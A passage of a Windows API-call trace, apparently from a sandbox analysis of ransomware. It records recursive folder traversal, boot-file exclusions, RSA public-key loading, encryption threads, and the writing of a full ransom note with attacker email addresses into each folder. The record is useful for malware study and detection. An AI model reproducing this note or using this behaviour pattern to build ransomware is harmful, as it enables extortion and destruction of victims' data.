(normalized: "c:\\users\\default\\videos\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.735] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Videos\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0140.735] PathFindFileNameW (pszPath="C:\\Users\\Default\\Videos") returned="Videos" [0140.735] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0140.735] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0140.735] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0140.735] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.735] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0140.735] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.735] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0140.735] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0140.735] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0140.735] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0 [0140.735] FindClose (in: hFindFile=0x3a5550 | out: hFindFile=0x3a5550) returned 1 [0140.735] FindClose (in: hFindFile=0x3a5550 | out: hFindFile=0x3a5550) returned 0 [0140.735] FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0140.735] lstrcmpW (lpString1="Default User", lpString2="..") returned 1 [0140.735] lstrcmpW (lpString1="Default User", lpString2=".") returned 1 [0140.736] lstrcpyW (in: lpString1=0x17f6b0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0140.736] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0140.736] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Default User" | out: lpString1="C:\\Users\\Default User") returned="C:\\Users\\Default User" [0140.736] SetErrorMode (uMode=0x1) returned 0x1 [0140.736] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default User" | out: lpString1="C:\\Users\\Default User") returned="C:\\Users\\Default User" [0140.736] lstrcatW (in: lpString1="C:\\Users\\Default User", lpString2="\\" | out: lpString1="C:\\Users\\Default User\\") returned="C:\\Users\\Default User\\" [0140.736] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default User\\" | out: lpString1="C:\\Users\\Default User\\") returned="C:\\Users\\Default User\\" [0140.736] lstrcatW (in: lpString1="C:\\Users\\Default User\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default User\\*.*") returned="C:\\Users\\Default User\\*.*" [0140.736] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0xffffffff [0140.736] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0140.736] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default User" | out: lpString1="C:\\Users\\Default User") returned="C:\\Users\\Default User" [0140.736] lstrcatW (in: lpString1="C:\\Users\\Default User", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default User\\*.*") returned="C:\\Users\\Default User\\*.*" [0140.736] StrStrW (lpFirst="C:\\Users\\Default User\\", lpSrch="Desktop") returned 0x0 [0140.736] StrStrW (lpFirst="C:\\Users\\Default User\\", lpSrch="DESKTOP") returned 0x0 [0140.736] SetErrorMode (uMode=0x1) returned 0x1 [0140.736] wsprintfW (in: param_1=0x17d57c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default User\\_HELP_INSTRUCTION.TXT") returned 43 [0140.736] GetUserNameW (in: lpBuffer=0x17b358, pcbBuffer=0x17b144 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17b144) returned 1 [0140.736] wsprintfW (in: param_1=0x17b150, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0140.737] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17b14c | out: phkResult=0x17b14c*=0x824) returned 0x0 [0140.737] RegQueryValueExW (in: hKey=0x824, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d03c08, lpcbData=0x17b148*=0x104 | out: lpType=0x0, lpData=0x3d03c08*=0x65, lpcbData=0x17b148*=0x4a) returned 0x0 [0140.737] RegCloseKey (hKey=0x824) returned 0x0 [0140.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17c57c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0140.737] wsprintfW (in: param_1=0x17b57c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0140.737] CreateFileW (lpFileName="C:\\Users\\Default User\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default user\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.737] CreateFileW (lpFileName="C:\\Users\\Default User\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default user\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.737] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0xffffffff [0140.737] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0140.737] FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0140.737] lstrcmpW (lpString1="Public", lpString2="..") returned 1 [0140.737] lstrcmpW (lpString1="Public", lpString2=".") returned 1 [0140.737] lstrcpyW (in: lpString1=0x17f6b0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0140.737] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0140.737] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0140.737] SetErrorMode (uMode=0x1) returned 0x1 [0140.737] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0140.738] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0140.738] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0140.738] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\*.*") returned="C:\\Users\\Public\\*.*" [0140.738] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3a5550 [0140.738] PathFindFileNameW (pszPath="C:\\Users\\Public") returned="Public" [0140.738] lstrcpyW (in: lpString1=0x17d784, lpString2="Public" | out: lpString1="Public") returned="Public" [0140.738] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.738] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.738] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.738] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0140.738] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0140.738] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0140.738] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0140.738] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0140.738] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0140.738] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0140.738] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch="Desktop") returned 0x0 [0140.738] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch="DESKTOP") returned 0x0 [0140.738] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\") returned 20 [0140.738] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0140.738] lstrcpyW (in: lpString1=0x17dfbc, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0140.738] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Public\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\") returned="\\\\?\\C:\\Users\\Public\\" [0140.738] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x828 [0140.739] Sleep (dwMilliseconds=0x96) [0140.920] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.920] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.920] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.920] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.920] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.920] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.920] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.921] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.921] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0 [0140.921] FindClose (in: hFindFile=0x3a5550 | out: hFindFile=0x3a5550) returned 1 [0140.921] FindClose (in: hFindFile=0x3a5550 | out: hFindFile=0x3a5550) returned 0 [0140.921] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0140.921] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\*.*") returned="C:\\Users\\Public\\*.*" [0140.921] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch="Desktop") returned 0x0 [0140.921] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch="DESKTOP") returned 0x0 [0140.921] SetErrorMode (uMode=0x1) returned 0x1 [0140.921] wsprintfW (in: param_1=0x17d57c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\_HELP_INSTRUCTION.TXT") returned 37 [0140.921] GetUserNameW (in: lpBuffer=0x17b358, pcbBuffer=0x17b144 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17b144) returned 1 [0140.921] wsprintfW (in: param_1=0x17b150, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0140.921] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17b14c | out: phkResult=0x17b14c*=0x82c) returned 0x0 [0140.922] RegQueryValueExW (in: hKey=0x82c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cbffe8, lpcbData=0x17b148*=0x104 | out: lpType=0x0, lpData=0x3cbffe8*=0x65, lpcbData=0x17b148*=0x4a) returned 0x0 [0140.922] RegCloseKey (hKey=0x82c) returned 0x0 [0140.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17c57c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0140.922] wsprintfW (in: param_1=0x17b57c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0140.922] CreateFileW (lpFileName="C:\\Users\\Public\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.922] CreateFileW (lpFileName="C:\\Users\\Public\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x82c [0140.979] WriteFile (in: hFile=0x82c, lpBuffer=0x17b57c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17b574, lpOverlapped=0x0 | out: lpBuffer=0x17b57c*, lpNumberOfBytesWritten=0x17b574*=0x2c4, lpOverlapped=0x0) returned 1 [0140.980] CloseHandle (hObject=0x82c) returned 1 [0140.980] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3a5550 [0140.980] PathFindFileNameW (pszPath="C:\\Users\\Public") returned="Public" [0140.980] lstrcpyW (in: lpString1=0x17d784, lpString2="Public" | out: lpString1="Public") returned="Public" [0140.980] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0140.980] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0140.980] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.980] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0140.980] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.980] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0140.980] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0140.980] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0140.980] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0140.980] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Desktop" | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0140.980] SetErrorMode (uMode=0x1) returned 0x1 [0140.980] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Desktop" | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0140.980] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0140.981] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Desktop\\" | out: lpString1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0140.981] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Desktop\\*.*") returned="C:\\Users\\Public\\Desktop\\*.*" [0140.981] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0140.981] PathFindFileNameW (pszPath="C:\\Users\\Public\\Desktop") returned="Desktop" [0140.981] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0140.981] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.981] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.981] lstrcmpW (lpString1="Adobe Reader X.lnk", lpString2="..") returned 1 [0140.981] lstrcmpW (lpString1="Adobe Reader X.lnk", lpString2=".") returned 1 [0140.981] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0140.981] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch="ntldr") returned 0x0 [0140.981] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch="NTLDR") returned 0x0 [0140.981] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch="NTDETECT.COM") returned 0x0 [0140.981] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch="ntdetect.com") returned 0x0 [0140.981] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0140.981] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.981] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0140.981] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0140.981] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0140.981] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0140.981] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0140.981] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0140.981] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0140.981] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0140.981] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.981] lstrcmpW (lpString1="Google Chrome.lnk", lpString2="..") returned 1 [0140.981] lstrcmpW (lpString1="Google Chrome.lnk", lpString2=".") returned 1 [0140.981] StrStrW (lpFirst="Google Chrome.lnk", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0140.981] StrStrW (lpFirst="Google Chrome.lnk", lpSrch="ntldr") returned 0x0 [0140.981] StrStrW (lpFirst="Google Chrome.lnk", lpSrch="NTLDR") returned 0x0 [0140.982] StrStrW (lpFirst="Google Chrome.lnk", lpSrch="NTDETECT.COM") returned 0x0 [0140.982] StrStrW (lpFirst="Google Chrome.lnk", lpSrch="ntdetect.com") returned 0x0 [0140.982] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0140.982] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.982] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2="..") returned 1 [0140.982] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2=".") returned 1 [0140.982] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0140.982] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch="ntldr") returned 0x0 [0140.982] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch="NTLDR") returned 0x0 [0140.982] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch="NTDETECT.COM") returned 0x0 [0140.982] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch="ntdetect.com") returned 0x0 [0140.982] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0140.982] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0140.982] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0140.982] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0140.982] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Desktop" | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0140.982] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Desktop\\*.*") returned="C:\\Users\\Public\\Desktop\\*.*" [0140.983] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0140.983] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0140.983] PathFindFileNameW (pszPath="C:\\Users\\Public\\Desktop") returned="Desktop" [0140.983] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0140.983] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0140.983] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0140.983] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.983] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0140.983] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.983] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.983] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.983] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.983] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0140.983] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0140.983] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0140.983] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.983] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0140.983] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0140.984] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0140.984] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0140.984] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0140.984] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0140.984] SetErrorMode (uMode=0x1) returned 0x1 [0140.984] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0140.984] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\" [0140.984] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Documents\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\" [0140.984] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Documents\\*.*") returned="C:\\Users\\Public\\Documents\\*.*" [0140.984] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0140.984] PathFindFileNameW (pszPath="C:\\Users\\Public\\Documents") returned="Documents" [0140.984] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0140.984] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.984] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0140.984] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0140.984] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0140.984] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0140.984] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0140.984] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 